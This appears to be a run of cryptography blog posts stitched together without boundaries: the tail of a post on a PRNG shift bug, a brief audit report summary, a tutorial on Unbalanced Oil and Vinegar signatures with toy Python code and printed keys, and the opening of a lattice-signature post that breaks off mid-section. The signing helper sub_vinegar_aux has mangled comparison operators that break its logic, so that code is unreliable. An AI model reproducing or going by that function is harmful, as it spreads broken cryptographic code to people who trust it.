The usage of the incorrect shift operation is a damaging bias in the output distribution. To illustrate this bias, the figure below shows a plot of the output distribution of the ChaChaPRNG implementation when seeded with the same seed as in the examples, and used to generate a total of 10,000 32-byte samples. In the figure below, the bytes are normalized to be in the [0, 255] range. The most striking outlier is the value 255 (the -1 discussed previously), which appears with probability over 20%. But other values also have significant biases, such as 0 (which appears with probability 2.46%) or 81 (which appears with probability 2.50%). In a truly random distribution, a given byte should appear with probability 1/256 = 0.390625.

Research has shown that leaking as little as one bit of an ECDSA nonce could lead to full key recovery. Thus, using the output of this PRNG for cryptographic applications could completely break the security of the systems that rely upon it.

The fix

In this instance, the fix was pretty simple. Replacing the right-shift operator in the rotateLeft32() function by an unsigned right shift ( >>> ) did the trick:

return (x << s) | (x >>> (n - s));

The figure below shows the “corrected” output distribution after modifications of the rotateLeft32(), with the same number of samples and the same seed as for the first figure. The vertical axis is cut off at the 3% mark to better show the distribution without the visualization being skewed by the higher-percentage 255 output. The corrected output distribution looks much more uniform.

Conclusion

When writing security-critical code, low level details such as bit operations on underlying number representation can have colossal consequences. In this post, we described a real-world case of a single missing “greater-than” character that totally broke the security of the PRNG built on top of the buggy function. This highlights the challenges of porting implementations between languages supporting different primitive types and arithmetic operations.

I’d like to thank Giacomo Pope and Gérald Doussot for their feedback on this post and for their careful review. Any remaining errors are mine alone.

Public Report – Penumbra Labs R1CS Implementation Review

In July 2023 Penumbra Labs engaged NCC Group’s Cryptography Services team to perform an implementation review of their Rank-1 Constraint System (R1CS) code and the associated zero-knowledge proofs within the Penumbra system. These proofs are built upon decaf377 and poseidon377, which have been previously audited by NCC Group, with a corresponding public report. The review was performed remotely with three consultants contributing 20 person-days over a period of two weeks, along with one additional consultant shadowing.

The review was scoped to R1CS-related functionality within the Penumbra codebase, including fixed-point arithmetic and proofs for Spend, Output, Swap, Swap Claim, Delegator Vote, and Undelegate Claim, alongside modifications to made to Zcash Sapling relating to key hierarchy, asset-specific generators, note format, tiered commitment tree, nullifier derivation, balance commitment, and usage of payload keys. R1CS gadgets in decaf377 and poseidon377 were also reviewed.

Demystifying Multivariate Cryptography

As the name suggests, multivariate cryptography refers to a class of public-key cryptographic schemes that use multivariate polynomials over a finite field. Solving systems of multivariate polynomials is known to be NP-complete, thus multivariate constructions are top contenders for post-quantum cryptography standards. In fact, 11 out of the 50 submissions for NIST’s call for additional post-quantum signatures are multivariate-based. Multivariate cryptography schemes have received new interest in recent years due to the push to standardize post-quantum primitives. Sadly, the resources available online to learn about multivariate cryptography seem to fall into one of two categories, high level overviews or academic papers. The former is fine for getting a feel for the topic, but does not give enough details to feel fully satisfied. On the other hand, the latter is chock full of details, and is rather dense and complex. This blog post aims to bridge the gap between the two types of resources by walking through an illustrative example of a multivariate digital signature scheme called Unbalanced Oil and Vinegar (UOV) signatures. UOV schemes serve as the basis for a number of contemporary multivariate signature schemes like Rainbow and MAYO. This post assumes some knowledge of cryptography (namely what a digital signature scheme is), the ability to read some Python code, and a bit of linear algebra knowledge. By the end of the post the reader should not only have a strong conceptual grasp of multivariate cryptography, but also understand how a (toy) implementation of UOV works.

Preliminaries

A multivariate quadratic (which is the degree of polynomial we concern ourselves with in multivariate cryptographic schemes) is a quadratic equation with with two or more indeterminates (variables). For instance a multivariate quadratic equation (MQ) with three indeterminates can be written as: p(x,y,z)=ax^2 + by^2 + cz^2 + dxy + exz + fyz + gx + hy + iz + j where at least one of the second degree terms a,b,c,d,e,f is not equal to 0. With a MQ defined we can now describe the hard problem on which the security of MQ cryptography schemes are based – the so-called MQ problem.

MQ Problem
Given a finite field of q elements \mathbb{F}_{q} and m quadratic polynomials p_1,\ldots,p_m \in \mathbb{F}_q[X_1,\ldots,X_n] in n variables for m<n, find a solution (x_1,\ldots,x_n) \in \mathbb{F}^{n}_{q} of the system of equations. That is for i=1,\ldots,m we have p_i(x_1,\ldots,x_n) = 0. The MQ problem is known to be NP-complete, and it is thought that quantum computers will not be able to solve this problem more efficiently than classical computers. However, in order to be able to design secure cryptographic schemes based on the MQ problem, we need to find a trapdoor that allows a party with some private information to efficiently solve the problem. This is like knowing the factorization of the modulus N in RSA or the discrete-log in Diffie-Hellman key exchange. Generally, in multivariate public key signature schemes we define the public verification key \mathsf{pub} as an ordered collection of m multivariate quadratic polynomials in n variables over a finite field \mathbb{F}_q for n > m. That is \mathsf{pub} = p_1,\ldots,p_m \in \mathbb{F}_q [X_1,\ldots,X_n]. The verification function is then a polynomial map V_{\mathsf{pub}}: \mathbb{F}^{n}_{q} \rightarrow \mathbb{F}^{m}_q such that: V_{\mathsf{pub}}(X_1,\ldots,X_n) = (p_1(X_1,\ldots,X_n),\ldots,p_m(X_1,\ldots,X_n)). Note that our signatures will be of length n and messages (or likely in practice a hash of the message we are signing) will be encoded as m field elements in \mathbb{F}_q. One simply verifies signatures by ensuring that V_{\mathsf{pub}}(\mathrm{signature}) =\mathrm{message} for some message corresponding to the signature. The secret key (singing key) \mathsf{priv} is then some data on how \mathsf{pub} is generated that makes it easy to invert V_{\mathsf{pub}} and generate a valid signature for a given message. Generating a valid signature for a given message without knowledge of the secret key is exactly an instance of the MQ problem, and thus should be hard for even a quantum-capable adversary. However, we need special structure of \mathsf{pub} to ensure that a trapdoor exists so that parties with knowledge of \mathsf{priv} be easily able to sign messages. This reduces the problem space, and thus may lead to vulnerabilities in multivariate cryptography schemes. One such design that seems to have remained secure despite years of thorough cryptanalysis is Unbalanced Oil and Vinegar signatures. We will describe the scheme in the next section and present a toy implementation and a walkthrough to see how the inner mechanisms of the scheme work.

Unbalanced Oil and Vinegar Signatures

Unbalanced Oil and Vinegar (UOV) multivariate signatures were fist introduced by Kipnis, Patarin, and Goubin in 1999. One can find the original paper here. UOV is based on an earlier scheme, Oil and Vinegar signatures introduced by Patarin in 1997. The earlier scheme was broken by a structural attack discovered by Kipnis and Shamir in 1998. However, with a slight variation of the original scheme the UOV signature scheme was created and is thought to be secure. We will now go through the parts of the signature algorithm.

UOV Paramters

We choose a small finite field \mathbb{F}_{q}, where we usually select q=2^{k} for some small power k. The n input variables (X_1,\ldots,X_n) are divided into two ordered collections, the so-called oil and vinegar variables: X_1,\ldots,X_o = O_1,\ldots,O_o and X_{o+1},\ldots,X_{o+v} = V_1,\ldots,V_v, respectively, with n=o+v. The message to be signed or (likely the hash of said message) is represented as an element in \mathbb{F}^{o}_{q} and is denoted m=(m_1,\ldots,m_o). The signature is then represented as an element of \mathbb{F}^{o+v}_{q} and is denoted s=(s_1,\ldots,s_{o+v}).

Private (Signing) Key

Our secret key is a pair (L,\mathcal{F}). We take L to be a bijective and affine function such that L : \mathbb{F}^{o+v}_{q} \rightarrow \mathbb{F}^{o+v}_{q}. For our purposes we can take the meaning of affine to be that the outputs of the function can be expressed as polynomials of degree one in the n=o+v indeterminates and that our coefficients on such inputs are in the field \mathbb{F}_q. Then, \mathcal{F} (also referred to as the central map) is an ordered collection of o functions that can be expressed in the form: f_k(X_1,\ldots,X_n) = \sum_{i,j} a_{i,j,k} O_i V_j + \sum_{i,j} b_{i,j,k} V_i V_j + \sum_{i} c_{i,k} O_i + \sum_{i} d_{i,k} V_i + e_k where k \in [1 \ldots o]. The coefficients a_{i,j,k}, b_{i,j,k}, c_{i,k}, d_{i,k}, e_{k} \in \mathbb{F}_{q} are selected randomly and are kept secret. Note, that vinegar variables “mix” quadratically with all other variables, but oil variables never “mix” with themselves. That is there are no O_i,O_j terms, hence the name of the scheme (although one might observe that this is not how actual salad dressing actually works).

Public (Verification) Key

Let X be an element of \mathbb{F}^{o+v}_{q} defined in the style of our input (x_1,\ldots,x_{o+v}). We then transform X into Z = L(X) = (z_1,\ldots,z_n), where L is our secret function. Each function f_k, k \in [1 \ldots o], can be written as a polynomial P_k of total degree two in the z_j unknowns, z \in [1 \ldots n] where n=o+v. We denote our public key, \mathcal{P}, as the ordered collection of these o polynomials in n=o+v unknowns: \forall k \in [1 \ldots o] \tilde{f}_{k} = P_{k}((z_1,\ldots,z_n)). That is to say we compose \mathcal{F} with L, \mathcal{P} = \mathcal{F} \circ L. We will elucidate how this computation is actually done in our illustrative example.

Signing

We solve for a signature s such that s=(s_1,\ldots,s_n) \in \mathbb{F}^{n}_{q} (where n=o+v) of message m (or hash of the message) m=(m_1,\ldots,m_o) \in \mathbb{F}^{o}_{q} in the following way. 1. Select random vinegar values v_{r,1},\ldots,v_{r,v} and substitute them into each of the k equations in \mathcal{F}. 2. We then are left to find the o unknowns o^{*}_1,\ldots,o^{*}_o that satisfy \mathcal{F}(o^{*}_1,\ldots,o^{*}_o,v_{r,1},\ldots,v_{r,v}) = (m_1,\ldots,m_o). This is a linear system of equations in the oil variables, as we have no O_i,O_j terms in our private key. This can be solved using Gaussian elimination. 3. If the system is indeterminate, return to step 1. 4. Compute the signature of m=(m_1,\ldots,m_o) as s = (s_1,\ldots,s_n) = L^{-1}(o^{*}_1,\ldots,o^{*}_o,v_{r,1},\ldots,v_{r,v}). In brief, we invert \mathcal{P} (solve the MQ problem) by using the secret structure of $\latex P$, i.e. the fact it is the composition of two linear functions, which are both easy to invert if you know said functions.

Verification

The recipient simply checks that \mathcal{P}(s_1,\ldots,s_n) = (m_1,\ldots,m_o).

Correctness

Recall that our verification key is \mathcal{P} = \mathcal{F} \circ L, and the signing key is (\mathcal{F},L). Our signature is of the form s= L^{-1} \circ \mathcal{F}^{-1}(m). Then we can show \mathcal{F} \circ L(L^{-1} \circ \mathcal{F}^{-1}(m)) =\mathcal{F} \circ \mathcal{F}^{-1}(m) =m as desired.

Security Considerations

As aforementioned the original Oil and Vinegar scheme is broken. That is, the case where v = o (or when they are quite close) is broken by the structural attack of Kipnis and Shamir. For v \geq o^{2} the scheme is not secure because of efficient algorithms to solve heavily under-determined quadratic systems. The current recommendation, for which no technique is known to reduce the difficulty of solving the MQ problem, is to set v = 2o or v =3o. Therefore, the scheme we examine is called Unbalanced due to the fact v \neq o.

Advantages and Problems of UOV

UOV, in addition to being thought to be quantum-resistant, provides very short signatures as compared to other post-quantum signature schemes like lattice-based and hash-based schemes. Moreover, the actual computational operations (while seemingly complex) only require additions and multiplications of small field elements that are fast and simple to implement even on constrained hardware. The largest issue with the UOV scheme is the size of the public keys. One needs to store approximately mn^{2}/2 coefficients for public keys. Techniques exist to expand about m(n^{2} - m^{2})/2 of the coefficients for the public key from a short seed, such that we only need to store m^{3}/2 coefficients. However, this is still a very large public key – about 66KB for 128 bits of security compared to just a 384 byte key for RSA at the same security level or a 1793 byte key for the lattice based scheme Falcon at a higher security level. Some modern candidates that use UOV as a base and how they go about trying to solve this key size problem will be discussed in the concluding remarks of this post

Illustrative Example

To illustrate how the UOV signatures work we implemented a toy implementation of a UOV scheme in Python3. The code is available here. It goes without saying that it is just for educational purposes and should not be used in any application desiring any real level of security. We will walk through the signing process step-by-step stopping to examine all values and intermediaries. We use NumPy to store polynomials in quadratic form, store our secret trapdoor linear transformation L, and to do linear algebra. We do note that the our UOV implementation is a slight simplification of the general description we give above. We discuss this next.

Simplification

In our above presentation of the UOV scheme we define our central map \mathcal{F} such that it contains not only quadratic terms, but also linear and constant terms. As a result, the public verification key \mathcal{P} also contains said terms. For the simplified variant we set these linear and constant terms to 0, and are left with only non-zero quadratic terms, that is our central map \mathcal{F} is a collection of homogenous polynomials of degree two. This simplified variant \mathcal{F} is an ordered collection of o functions that can be expressed in the form: f_k(X_1,\ldots,X_n) = \sum_{i,j} a_{i,j,k} O_i V_j + \sum_{i,j} b_{i,j,k} V_i V_j where k \in [1 \ldots o] and all coefficients are in \mathbb{F}_{q}. This simplification presents a number of advantages. Namely, the components f_k of \mathcal{F} can we written as an upper triangular matrix in F_{q}^{n \times n} of quadratic forms. For the below example we set o=2,v=4.

Note that oil variables do not mix, so we have a block zero matrix in the upper-left of this representation. Further, this allows us to define our secret transformation L to be in GL_{n}(\mathbb{F}_q) where GL is the general linear group. That is (for our purposes) L is an invertible matrix with dimensions n \times n and entries in our field \mathbb{F}_q. One can always turn a homogenous system of polynomial equations in n variables into an equivalent system of n-1 variables by fixing one of the variables to $1$. In the reverse this process is called homogenization. Thus, we still preserve the structure of the UOV signing key with this simplification. In turn, from the point of view of a key-recovery attack the security of this simplified variant of UOV is equivalent to that of original UOV with n-1 indeterminates..

Parameters

A note on presentation: As opposed to above where we used \LaTeX typesetting for math, we will keep our mathematical notation in the prose in line with our choices in the code. That is we will use inline code blocks to typeset variable names and math (i.e. F is our central map.) We will work over the field GF(256). We use the galois package to do array arithmetic and linear algebra over the field. For more information about how to do arithmetic in Galois (finite) fields see this Wikipedia page. For this example we set o=3 and v=2o=6. These parameters are far to small to provide actual security, but work nicely for our illustrative example. Below is the parameter information our implementation spits out.

Galois Field:
  name: GF(2^8)
  characteristic: 2
  degree: 8
  order: 256
  irreducible_poly: x^8 + x^4 + x^3 + x^2 + 1
  is_primitive_poly: True
  primitive_element: x

The parameters are o=3 and v=6.

Key Generation

Private (Signing) Key

To generate the central map F generate o random multivariate polynomials in the style described in the simplified UOV scheme. Each polynomial is stored as a n x n = (o+v) x (o+v) NumPy matrix. The complete central map is a o-length list of these matrices.

def generate_random_polynomial(o,v):
    f_i = np.vstack(
    (np.hstack((np.zeros((o,o),dtype=np.uint8),np.random.randint(256, size=(o,v), dtype=np.uint8))),
    np.random.randint(256, size=(v,v+o),dtype=np.uint8))
    )
    f_i_triu = np.triu(f_i)
    return GF256(f_i_triu)

def generate_central_map(o,v):
    F = []
    for _ in range(o):
        F.append(generate_random_polynomial(o,v))
    return F

To generate our secret transformation L, we generate a random n x n matrix and ensure that it is invertible, as this will be necessary to compute signatures.

def generate_affine_L(o,v):
    found = False
    while not found:
        try:
            L_n = np.random.randint(256, size=(o+v,o+v), dtype=np.uint8)
            L = GF256(L_n)
            L_inv = np.linalg.inv(L)
            found = True
        except:
            found = False
    return L, L_inv

Then, we have a wrapper function that generates our private key using the above functions as the triple (F, L, L_inv). We deviate from the standard definition of the signing key by also storing the inverse of L, denoted L_inv.

def generate_private_key(o,v): 
    F = generate_central_map(o,v)
    L, L_inv = generate_affine_L(o,v)
    return F, L, L_inv

When we run this key generation code for our simple example, we get the following private key. We can see that F is three homogenous quadratics where the entries in the matrices represent the coefficients of said quadratics. Note the 0 terms where oil and oil terms would have coefficients (they do not mix)! Moreover, we only need an upper-triangular matrix as i,j and j,i for all i,j in [1...n] would specify the same coefficient.

Private Key:

F (Central Map) = 
0:
 [[  0   0   0 153 175 153  51 224  89]
 [  0   0   0  20 143  18 179  13 175]
 [  0   0   0  74 231 146 106 136 149]
 [  0   0   0 248 197  59  50  41  57]
 [  0   0   0   0 213  77 187 165  54]
 [  0   0   0   0   0  97 154  37 163]
 [  0   0   0   0   0   0  93 246  71]
 [  0   0   0   0   0   0   0 181 188]
 [  0   0   0   0   0   0   0   0   3]]

1:
 [[  0   0   0  71  26 115   9 248 114]
 [  0   0   0  31  53 162  77  82  46]
 [  0   0   0 254 178  43 219 124 196]
 [  0   0   0 150  85 216  38  28 197]
 [  0   0   0   0 147  73 216 111  98]
 [  0   0   0   0   0  30 140 222  36]
 [  0   0   0   0   0   0 108  54 105]
 [  0   0   0   0   0   0   0 253  38]
 [  0   0   0   0   0   0   0   0  55]]

2:
 [[  0   0   0  98  27 252 165  31  42]
 [  0   0   0 180 169 247 143 217 128]
 [  0   0   0  13 111  90  98  40 233]
 [  0   0   0 223 243 229 156 183  45]
 [  0   0   0   0  40 136  12 123  44]
 [  0   0   0   0   0 251  92  77 174]
 [  0   0   0   0   0   0  81 150  95]
 [  0   0   0   0   0   0   0 196 207]
 [  0   0   0   0   0   0   0   0 108]]

Further, we show L and L_inv and confirm that they were generated correctly as their product is the identity matrix, that is L · L_inv= I.

Secret Transformation L=:
[[  0 207  67 204  15  76 173  14  42]
 [193  54  49  19  64 222  93 165 108]
 [102 211 114  71  22 229 187 221 194]
 [196 251  77 219 159   4 110 107 241]
 [ 78  88  49 133 238 243  17 125 203]
 [ 95 159 145 105 221  55 185 165  24]
 [ 45  55  31  37 149 168   4  21  48]
 [163 127 150 135  56 210 241 110  25]
 [222   3 207 202 136  66 121  18 119]]

Secret Inverse Transformation L_inv=:
[[127 172  42  59  73  10 183 116  70]
 [ 33 153 229 239 106  99 227  54  51]
 [218 196 248  10 124  46  25  73 128]
 [ 15  36 200  28 138 156 210 164 229]
 [114 107 134 126  40 230 238 249  70]
 [ 88 100  51 161 145  52 157 138 130]
 [208 188  30 227  66 116 191 100 183]
 [172  88 227 121 142 132 247 223  18]
 [138 145 247 168 180  35 185 149  67]]

Confirming L is invertible as L*L_inv is I=:
 [[1 0 0 0 0 0 0 0 0]
 [0 1 0 0 0 0 0 0 0]
 [0 0 1 0 0 0 0 0 0]
 [0 0 0 1 0 0 0 0 0]
 [0 0 0 0 1 0 0 0 0]
 [0 0 0 0 0 1 0 0 0]
 [0 0 0 0 0 0 1 0 0]
 [0 0 0 0 0 0 0 1 0]
 [0 0 0 0 0 0 0 0 1]]

Public (Verification) Key

We compute our public verification key by computing L ∘ f for each f in F. This is made easy as we can do this in quadratic form, thus each f_p in P is computed as L_T · f · L for each f in F where L_T is the transpose of L.

def generate_public_key(F,L):
    L_T = np.transpose(L)
    P = []
    for f in F:
        s1 = np.matmul(L_T,f)
        s2 = np.matmul(s1,L)
        P.append(s2) 
    return P

The following is our collection of o=3 polynomials that make up our public verification key P again represented as a list of matrices, that result from the above calculation using F and L that we generated as our private key.

Public Key = F ∘ L = 

0:
[[246  74 117 248  72   5 143 224 135]
 [116  10  17 156  68 243 203 128 192]
 [148 215 239 220 212  65 184 253 214]
 [211 116 203 186  61  26 104  21 157]
 [155  87  23 174  10 242  98 215 238]
 [189 209 203 142 221 105 179 173   8]
 [109  27 161 201 155 133 197 180  66]
 [227 228 150  92 248  73 213 205 192]
 [ 51  30 193 111 242 244  74 177 154]]

1:
[[ 92 131 253  40 192 243 101 228 217]
 [114  70  34 148 150 144  29  53 193]
 [127 161   2 248  42 126 245 122 175]
 [249  59 218  30  46 114  58 214  97]
 [ 12 212 246 155  93  76 168 162 120]
 [108  53 107 153   7 216 233 137  93]
 [249 177  82 164   4 117  25 179 152]
 [107 105 135  34 189  97  53  29  38]
 [140 127 214 137 206 171  45 109 110]]

2:
[[156  73  34 203 141 187  88  54 168]
 [ 90 252 145  72 161 130  93 150 169]
 [112 158  75   6 174 157 206 192 193]
 [214 198 116 243 190 194 214  22   5]
 [ 74 231 235 113 151  91  75 122 123]
 [200  77 208 125  99 169 229 104  55]
 [184 128  22  88  42 170 139 233 189]
 [ 27 149  64  89  77 158 248  65 150]
 [ 93  59 212 106 143 221  24 178 242]]

Signing

To sign we first define some helper functions. The first picks v=6 random vinegar variable values rvv as specified in the signing algorithm.

def generate_random_vinegar(v):
    vv = np.random.randint(256, size=v, dtype=np.uint8)
    rvv = GF256(vv)
    return rvv

We then substitute this selection of random vinegar variables rvv in each f in F, collecting terms such that the only remaining unknowns will be o1,o2,o3 – our oil variables.

def sub_vinegar_aux(rvv,f,o,v):
    coeffs = GF256([0]* (o+1))
    # oil variables are in 0  lt;= i  lt; o
    # vinegar variables are in o  lt;= i  lt; n 
    for i in range(o+v):
        for j in range(i,o+v):
            # by cases
            # oil and oil do not mix
            if i  lt; o and j =o and j  gt;= o:
                ij = GF256(f[i,j])
                vvi = GF256(rvv[i-o])
                vvj = GF256(rvv[j-o])
                coeffs[-1] += np.multiply(np.multiply(ij,vvi), vvj)
            # have mixed oil and vinegar variables that contribute to o_i coeff
            elif i = o:
                ij = GF256(f[i,j])
                vvj = GF256(rvv[j-o])
                coeffs[i] += np.multiply(ij,vvj)
            # condition is not hit as we have covered all combos
            else:
                pass
    return coeffs

We collect the equations once the fixed random vinegar variables have been substituted (only leaving our unknown oil variables). This will be a linear system of o=3 equations in o=3 unknowns – which is easy to solve!

def sub_vinegar(rvv,F,o,v):
    subbed_rvv_F = []
    for f in F:
        subbed_rvv_F.append(sub_vinegar_aux(rvv,f,o,v))
    los = GF256(subbed_rvv_F)
    return los

To solve the system we separate the coefficients on the unknown oil variables M from the constant terms c. We then take our message m (which is an element of length o in GF(256)) and subtract c from it to form the y that we need to find a solution x for. We then solve for said x. Finally, we compute the signature s for m by stacking x with the selected random vinegar variables rvv and taking s as the product of the inverse of our secret transformation L_inv and the stacked solution x and the random vinegar variables rvv.

def sign(F,L_inv,o,v,m):
    signed = False
    while not signed:
        try:
            rvv = generate_random_vinegar(v)
            los = sub_vinegar(rvv,F,o,v)
            M = GF256(los[:, :-1])
            c = GF256(los[:, [-1]])
            y = np.subtract(m,c)
            x = np.vstack((np.linalg.solve(M,y), rvv.reshape(v,1)))
            s = np.matmul(L_inv, x)
            signed = True
        except:
            signed = False
    return s

For this example we select m=[10,25,11] to be Évariste Galois’s – the father of finite fields – birthday.

m =
[[10]
 [25]
 [11]]

We then select our random vinegar values rvv.

rvv = [120 104 210   3   0 154]

After substitution we are left with the following M.

M =
[[252 223  17 183]
 [200 254 141 176]
 [116 200  15  43]]

We separate out the constant terms c of the linear oil system and subtract them from the message values m and solve the linear system using Gaussian elimination.

y = m-c =
 [[10]
 [25]
 [11]] 
-
 [[183]
 [176]
 [ 43]]
 =
 [[189]
 [169]
 [ 32]]

f(o1,o2,o3) =
 [[252 223  17]
 [200 254 141]
 [116 200  15]]|[[189]
 [169]
 [ 32]]

This yields the solution o1,o2,o3 =
 [[68]
 [49]
 [94]]

We stack this solution x with our random vinegar variables rvv to form a complete solution to the non-linear multivariate polynomial system of equations:

[x | rvv] =
 [[ 68]
 [ 49]
 [ 94]
 [120]
 [104]
 [210]
 [  3]
 [  0]
 [154]]

We can check out solution by plugging them into the central map.

m = x_T · F · x =
 [[10]
 [25]
 [11]]

We see that this check works and we finally we compute our signature as:

s = L_inv · x =
 [[ 50]
 [ 79]
 [107]
 [122]
 [209]
 [241]
 [ 80]
 [173]
 [241]]

Verification

To verify the message we simply compute P(s1,s2,...,sn) and check that the result (our computed message) is equal to the corresponding original message. This is made easy as we can do this in quadratic form, thus for each f_p in P we compute s_T · f_p · s where s_T is the transpose of s.

def verify(P,s,m):
    cmparts= []
    s_T = np.transpose(s)
    for f_p in P:
        cmp1 = np.matmul(s_T,f_p)
        cmp2 = np.matmul(cmp1,s)
        cmparts.append(cmp2[0])
    computed_m = GF256(cmparts)
    return computed_m, np.array_equal(computed_m,m)

Now let’s see if our signature is correct given our public_key and message.

computed_message = s_T · P · s=
[[10]
 [25]
 [11]]

computed_message == message is True

Hey, it works!

Exhaustive Test

As a sanity check we wrote a test function that generates a random private, public key pair for small parameters o=2, v=4. We continue to work over the field GF(256). With these parameters note that the messages we will be signing will be of field elements in GF(256) of length 2. As field elements taken on values in the range 0 to 255 there are 256**2 = 65536 total messages in the message space. We generate all messages in the message space and check that we can generate valid signatures for all of them.

# test over the entire space of messages for small parameters
def test():
    o = 2 
    v = 4
    F, L, L_inv = generate_private_key(o,v) # signing key
    P = generate_public_key(F,L) # verification key

    total_tests = 0
    tests_passed =0

    for m1 in range(256):
     for m2 in range(256):
         total_tests+=1
         m = GF256([[m1],[m2]])
         s = sign(F,L_inv,o,v,m)
         computed_m,verified = verify(P,s,m)
         if verified:
             tests_passed+=1
         print(f"Test: {total_tests}\nMessage:\n{m}\nSignature:\n{s}\nVerified:\n{verified}\n")
    
    print(f"{tests_passed} out of {total_tests} messages verified.")

We now look at the output of the test and see that we were able to generate signatures for every message in the message space. This instills confidence in the validity of our implementation. The full test_results.txt file for one random key pair is included in the GitHub repository of our implementation that is linked above.

Test: 1
Message:
[[0]
 [0]]
Signature:
[[ 53]
 [211]
 [161]
 [  6]
 [228]
 [124]]
Verified:
True
.
.
.
Test: 65536
Message:
[[255]
 [255]]
Signature:
[[144]
 [ 98]
 [143]
 [  0]
 [124]
 [122]]
Verified:
True

65536 out of 65536 messages verified.

Concluding Remarks

Multivariate cryptography has seen renewed interest recently due to the call for the standardization of post-quantum cryptography. Recall that the main issue with UOV signature schemes are that the public keys are huge. Many contemporary schemes have tried to solve this issue. For instance, Rainbow is a scheme based on a layered UOV approach that reduces the size of the public key. It was selected as one of the three NIST Post-quantum signature finalists. However, a key recovery attack was discovered by Beullens and Rainbow is no longer considered secure. Note, this attack does not break UOV, just Rainbow. Furthermore, MAYO was put forth as a possible post-quantum signature candidate in NIST’s call for additional PQC signatures. MAYO uses small public keys comparable to that of lattice based schemes that are “whipped-up” during signing and verification – for details go to the MAYO website. In addition to exploring Rainbow and MAYO, in may interest the reader to explore Hidden Field Equations, which is another construction of multivariate cryptography schemes.

Acknowledgments

Thank you to Paul Bottinelli and Elena Bakos Lang for their thorough reviews and thoughtful feedback on this blog post. All remaining errors are the author’s.

Building Intuition for Lattice-Based Signatures – Part 2: Fiat-Shamir with Aborts

Introduction

This two-part blog series aims to build some intuition for the main techniques that are used to construct lattice-based signatures, focusing in particular on the techniques underlying Falcon and Dilithium, the two lattice-based signature schemes selected for standardization by the National Institute of Standards and Technology (NIST). In part 1 of this two-part blog post (Building Intuition for Lattice-Based Signatures – Part 1: Trapdoor Signatures), we covered how to build lattice-based trapdoor signatures based on the hardness of the Closest Vector Problem (CVP) using the hash-and-sign paradigm, which lies at the core of Falcon.

In this second part, we will describe an alternative construction of lattice-based signatures relying on the hardness of the Shortest Vector Problem (SVP) and the Fiat-Shamir paradigm, which is used as a basis for the signature scheme Dilithium. For a quick refresher on lattice theory and notation that will be used throughout this post, see the Lattice Background section in part 1 of this blog post.

Table of Contents

Constructing Signatures Using Fiat-Shamir and the SVP

Recall that the SVP_\gamma problem asks to find a short lattice vector of length at most a multiplicative approximation factor \gamma \geq 1 of the length of the shortest (non-zero) vector in the lattice. In order to construct a lattice-based signature scheme based on the SVP_\gamma, we focus on a special case of the SVP_\gamma problem instantiated on q-ary lattices, known as the Short Integer Solution (SIS) problem. Formally, SIS_{n,m,q,\beta} can be defined as follows. Given A \subseteq \mathbb{Z}_q^{m \times n}, find a short \vec{z} \in \mathbb{Z}^m in the q-ary lattice \Lambda^\perp(A) satisfying A\vec{z} \equiv \vec{0} \mod q and \|\vec{z}\| \leq \beta. (Note that any norm can be used here. Common choices include the \ell_2 and \ell_\infty norms.)

The SIS problem lends itself well to constructing cryptographic primitives. If we choose our domain to be a set of short vectors, then we can show the function \vec{x} \to A\vec{x} is in fact a hash function1 which is collision-resistant and one-way.

Indeed, let D_b^m : \{\vec{x}: \|\vec{x}\|_\infty \leq b\} and suppose we define the hash function f_A: D^m \to \mathbb{Z}_q. If we could find a collision \vec{x}_1, \vec{x}_2 \in \mathbb{Z}^m such that A\vec{x}_1 \equiv A\vec{x}_2 \mod{q}, then \vec{x}_1  - \vec{x}_2 is a solution to the SIS_{n,m,q,\beta = 2b} problem. Indeed, we have that A\vec{x}_1 - A\vec{x}_2 = A(\vec{x}_1 - \vec{x}_2) \equiv \vec{0} \mod{q} and, since both \vec{x}_1 and \vec{x}_2 are short, we know \vec{x}_1 - \vec{x}_2 is also bounded, with \|\vec{x}_1 - \vec{x}_2\|_\infty \leq \|\vec{x}_1\|_\infty + \|\vec{x}_2\|_\infty  = 2b, and hence is a solution to SIS_{n,m,q,\beta = 2b}.

We will now show how to use this one-way function to construct lattice-based identification schemes and signatures.

Signature Schemes from Identification Schemes

In order to use SIS as the hard problem at the heart of a lattice-based signature scheme, we use a construction based on identification schemes. In general, one can use a one-way function to construct an identification scheme, which can then in turn be used to construct a signature scheme using the Fiat-Shamir transform as follows.

A commit-challenge-response identification protocol can be used for Alice to prove knowledge of some secret information (such as a private key \mathrm{sk}, corresponding to a public key \mathrm{pk}). It consists of three main steps: First, Alice chooses a random (secret) value y, and computes a commitment to y using a one-way function f(y), which she sends to Bob. Then, Bob responds to this with a random challenge c. Finally, Alice provides a response combining y, c and the secret key \mathrm{sk} in such a way that it can be verified using the commitment f(y) and the public key \mathrm{pk}, but no information about \mathrm{sk} is leaked.

As an example, suppose Alice wants to prove to Bob that she knows s, the discrete logarithm of S = g^s \in \mathbb{Z}_q. One method of doing so is the Chaum Identification Scheme:

Note that someone impersonating Alice (i.e. someone who does not know sk = s) would be able to return an answer that Bob accepts at most 1/2 of the time, as they can either choose a commitment that verifies correctly in the case of c=0 or c=1 (but not both). Repeating this interaction k times (successfully) would thus convice Bob that the person he is interacting with is Alice with probability 1 - 1/2^k. This process can be parallelized, as is done in Schnorr’s Identification Scheme:

The main downside of this process is the requirement for it to be interactive, as it incurs communication costs, and requires Alice to be available when proving her identity.

To avoid those drawbacks, one can use the Fiat-Shamir heuristic – a method to transform an interactive identification scheme such as the ones above to a non-interactive signature scheme. The basic idea is to replace the challenge with the output of a random oracle (in practice, a cryptographic hash function is used instead) that depends on the message and public values.

For the example above, the identification scheme can be adapted to generate Schnorr (non-interactive) signatures as follows:

KeyGen():

1. \mathrm{sk}: s \leftarrow \mathbb{Z}_q \setminus {0}
2. \mathrm{pk}: g^s, where g is a public value that generates \mathbb{Z}_q

Sign(s, m):

1. y\leftarrow\mathbb{Z}_q\setminus\{0\}
2. c=H(g^y, m)
3. z = cs + y
4. Return signature \sigma = (z, g^y)

Verify(g^s, m, \sigma = (z, g^y)):

1. c' = H(g^y, m)
2. Output g^z== g^s(g^y)^{c'}

Equivalently, the signer could instead send the signature \sigma = (z, c), in which case the verifier computes g^{y'} = g^z(g^s)^{-c} and checks that c == H(g^{y'}, m) to check that it was properly generated.

Lattice-Based Identification Schemes

Taking a similar approach, we can use the one-way function defined using SIS to define lattice-based identification and signature schemes, using an approach first introduced by Lyubashevsky in [Lyu08].

